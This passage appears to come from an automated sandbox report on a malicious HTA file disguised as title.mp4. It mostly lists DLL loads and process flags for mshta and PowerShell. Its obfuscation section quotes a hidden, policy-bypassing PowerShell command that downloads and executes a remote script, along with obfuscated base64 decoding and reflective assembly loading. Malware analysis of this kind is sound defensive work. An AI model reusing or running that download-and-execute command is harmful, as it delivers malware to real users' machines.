                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: title.mp4.htaStatic file information: File size 2727626 > 1048576

                          Data Obfuscation

                          barindex
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, e.cs.Net Code: e System.Reflection.Assembly.Load(byte[])
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteSTriNG = $Enc.$CVuaLhN1RccnM3ERl0SadUDnZEo1bErVwcWOIMKX3lRIWGCiQGYHB5vyAHRyPaAUtYWpxCJxcEBSm0eyqdVCZt8p3as6IScdMHffaSTD7vBmakZa5f1y4TygvKpzCRdcgCv5icqS2x91xwwR8f0LerOe5uYPYg
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02A92CC9 push 04B8073Ch; retf 2_2_02A92CEE
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03653F20 push eax; iretd 5_2_03653F29
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E2D2E5 push edi; retf 5_2_04E2D2E6
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761CF64 push cs; retf 5_2_0761CF6D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07659328 push FFFFFF8Bh; iretd 5_2_0765932F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07659315 push FFFFFF8Bh; ret 5_2_07659318
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076719B1 push dword ptr [ebx+esi-75h]; iretd 5_2_076719BD
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076AA851 push ds; ret 5_2_076AA857
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A4CC8 push 00000007h; ret 5_2_076A4D00
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D5E2AC push FFFFFF8Bh; iretd 5_2_07D5E2B0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D5E160 pushfd ; iretd 5_2_07D5E161
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_051B2435 push eax; retf 11_2_051B24C1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_051B24A8 push eax; retf 11_2_051B24C1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_051B23D5 push esp; retf 11_2_051B23DA
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'y8', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
